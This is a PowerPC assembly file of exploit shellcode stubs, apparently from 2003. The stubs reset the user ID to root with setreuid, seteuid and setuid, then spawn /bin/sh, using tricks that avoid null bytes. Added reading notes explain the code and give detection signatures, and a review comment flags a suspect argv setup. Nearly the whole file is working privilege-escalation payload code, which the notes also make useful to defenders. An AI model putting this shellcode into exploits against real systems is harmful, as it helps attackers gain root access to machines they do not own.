;;;
;;; PowerPC exploit payload components:
;;; setreuid(0), seteuid(0), setuid(0), execve("/bin/sh")
;;;
;;; Dino Dai Zovi, 20031221
;;;
;;; Reading notes:
;;;   - Syntax appears to be Darwin/Apple `as` PowerPC (bare rN register
;;;     names, `;` comments, leading-underscore labels) -- confirm against
;;;     the build that consumes this file.
;;;   - Each stub puts the system call number in r0 and its arguments in
;;;     r3, r4, r5, then executes the word 0x44ffff02.
;;;   - No stub ends in a branch or return, so execution falls through from
;;;     one label into the next in file order.
;;;   - Only _execve_binsh is exported (.globl); the three set*uid labels
;;;     are file-local.
;;;   - Detection: an assembler encodes `sc` as 0x44000002. The form used
;;;     here has the reserved bits set, which is why it is emitted with
;;;     .long, and compilers do not normally produce it, so the word
;;;     0x44ffff02 in a data stream is a useful signature. The immediates
;;;     0x2f62, 0x696e, 0x2f2f and 0x7368 ("/bin//sh") are a second one.
;;;

.globl  _execve_binsh
.text

;;;
;;; *BSD setreuid(0) code
;;;
_setreuid_zero:
        xor     r3, r3, r3              ; r3 = 0 (first argument)
        xor     r4, r4, r4              ; r4 = 0 (second argument)
        li      r0, 126                 ; r0 = 126, the setreuid number per the heading above
        .long   0x44ffff02              ; sc, reserved bits set

;;;
;;; *BSD seteuid(0) code
;;;
_seteuid_zero:
        xor     r3, r3, r3              ; r3 = 0 (only argument)
        li      r0, 183                 ; r0 = 183, the seteuid number per the heading above
        .long   0x44ffff02              ; sc, reserved bits set

;;;
;;; *BSD setuid(0) code
;;;
_setuid_zero:
        xor     r3, r3, r3              ; r3 = 0 (only argument)
        li      r0, 23                  ; r0 = 23, the setuid number per the heading above
        .long   0x44ffff02              ; sc, reserved bits set

;;;
;;; *BSD/Linux execve('/bin/sh') code
;;;
;;; Builds the path as three words below the stack pointer (r1):
;;;   r29 = 0x2f62696e "/bin", r30 = 0x2f2f7368 "//sh", r31 = 0 (terminator)
;;; then issues two system calls in a row: number 59 first, and, if
;;; execution continues past it, number 11.
;;;
_execve_binsh:
        xor     r31, r31, r31           ; r31 = 0, stored as the string terminator
        lis     r30, 0x2f2f             ; r30 = 0x2f2f0000
        addi    r30, r30, 0x7368        ; r30 = 0x2f2f7368 = "//sh"
        lis     r29, 0x2f62             ; r29 = 0x2f620000
        addi    r29, r29, 0x696e        ; r29 = 0x2f62696e = "/bin"
        stmw    r29, -12(r1)    ; -12 is arbitrary null-eliding constant
                                        ; stmw stores r29, r30, r31 as consecutive words at r1-12
        addi    r3, r1, -12             ; r3 = address of "/bin//sh"
        xor     r4, r7, r4              ; NOTE(review): r4 = r7 ^ r4, unlike the self-XOR
                                        ; zeroing used elsewhere, so argv depends on the
                                        ; incoming r4 and r7 -- confirm this is intended
        xor     r5, r5, r5              ; r5 = 0 (envp = NULL)
        li      r30, 30209              ; 30209 >> 9 = 59; presumably loaded indirectly for the
                                        ; same zero-byte-avoidance reason as the -12 offset
        srawi   r0, r30, 9      ; r0 = 59
        .long   0x44ffff02      ; execve(path, argv, NULL)
        addi    r3, r1, -12             ; reload the path pointer; r4 and r5 are not reloaded
        li      r30, 5633               ; 5633 >> 9 = 11
        srawi   r0, r30, 9              ; r0 = 11, presumably the Linux execve number named
                                        ; in the heading -- confirm
        .long   0x44ffff02              ; sc, reserved bits set